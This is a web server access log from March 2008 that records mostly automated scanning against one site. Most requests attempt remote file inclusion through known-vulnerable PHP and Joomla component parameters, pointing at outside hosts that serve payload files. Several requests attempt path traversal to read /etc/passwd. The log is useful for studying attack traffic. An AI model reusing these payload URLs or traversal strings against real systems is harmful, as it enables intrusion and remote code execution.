74.6.8.120 - - [25/Mar/2008:10:15:56 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:10:15:59 -0700] "GET /index.php?option=com_directory&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:16:41 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:16:42 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:16:42 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:17:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:17:35 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:17:36 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:17:36 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:10:17:41 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.250.234.234 - - [25/Mar/2008:10:18:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.250.234.234 - - [25/Mar/2008:10:18:09 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:18:39 -0700] "GET /logs/access_071229.log/upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:18:39 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:18:39 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:10:19:09 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:10:19:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:10:19:10 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:19:44 -0700] "GET /logs/access_080118.log/components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:19:45 -0700] "GET /components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:19:45 -0700] "GET /logs/components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:19:48 -0700] "GET /logs/access_071231.log/upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:19:54 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:10:20:18 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:10:20:18 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:10:20:21 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:10:20:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:10:20:27 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:10:20:27 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:10:20:59 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:10:20:59 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:10:20:59 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:10:20:59 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:10:21:00 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:10:21:01 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:21:25 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:21:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:10:21:26 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:10:21:41 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:10:21:41 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:10:21:41 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:22:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:22:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:10:22:43 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:22:57 -0700] "GET /logs/access_080215.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:22:57 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:22:57 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.176.126 - - [25/Mar/2008:10:23:01 -0700] "GET //admin/config_pages.php?loggedin=1http://meehay.com//photogallery/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
82.165.176.126 - - [25/Mar/2008:10:23:01 -0700] "GET /logs//admin/config_pages.php?loggedin=1http://meehay.com//photogallery/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:10:23:04 -0700] "GET /logs/access_080215.log/voir.php?inc=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:10:23:05 -0700] "GET /voir.php?inc=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:10:23:07 -0700] "GET /logs/voir.php?inc=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:23:09 -0700] "GET /logs/access_080225.log/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:23:09 -0700] "GET /db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:23:09 -0700] "GET /logs/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:23:26 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:23:26 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:23:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:23:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:23:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:23:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:10:23:31 -0700] "GET /logs/access_080120.log/upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:10:23:32 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:10:23:32 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:10:23:35 -0700] "GET /logs/access_080124.log/components/com_simpleboard/image_upload.php?sbp=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:23:54 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.75.17.149 - - [25/Mar/2008:10:23:58 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:10:24:01 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:10:24:04 -0700] "GET /logs/access_080215.log/voir.php?inc=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:24:10 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:10:24:12 -0700] "GET /voir.php?inc=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:10:24:17 -0700] "GET /logs/voir.php?inc=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:10:24:33 -0700] "GET /logs/access_080218.log//index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.75.17.149 - - [25/Mar/2008:10:25:17 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 549888 "-" "Mozilla/4.75 [en]" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:10:25:40 -0700] "GET /logs/access_080207.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:10:25:46 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:10:25:52 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:26:17 -0700] "GET /logs/access_080124.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:10:26:18 -0700] "GET /logs/access_080215.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:10:26:18 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:10:26:19 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:26:33 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:26:33 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:26:33 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:26:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:26:46 -0700] "GET /logs/access_071211.log/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:10:26:48 -0700] "GET //playing.php/common/db.php?commonpath=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:27:49 -0700] "GET /logs/access_080223.log/index.php?body=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:27:50 -0700] "GET /index.php?body=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:27:50 -0700] "GET /logs/index.php?body=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:28:02 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [25/Mar/2008:10:28:03 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.208.244 - - [25/Mar/2008:10:28:10 -0700] "GET /logs/access_080312.log/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:10:29:07 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:29:08 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:29:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:29:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.120 - - [25/Mar/2008:10:29:26 -0700] "GET /bikes/dteel/2008_02_16/?S=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:29:47 -0700] "GET /logs/access_071202.log//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:29:47 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:29:47 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.158.0.5 - - [25/Mar/2008:10:29:51 -0700] "GET /playing.php/common/db.php?commonpath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
88.158.0.5 - - [25/Mar/2008:10:29:51 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:29:56 -0700] "GET /logs/access_071202.log//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:29:56 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:29:56 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:30:03 -0700] "GET /logs/access_071202.log//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:30:03 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:30:04 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:10:30:42 -0700] "GET /index.php?option=com_lmo&file=&action=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:10:31:26 -0700] "GET /logs/access_080223.log/encapscms_PATH/core/core.php?root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:10:31:26 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:10:31:27 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:10:31:28 -0700] "GET /logs/access_071212.log//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.20 - - [25/Mar/2008:10:32:05 -0700] "GET /logs/access_080225.log/index.php?body=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:10:32:47 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:10:33:07 -0700] "GET /logs/access_080225.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
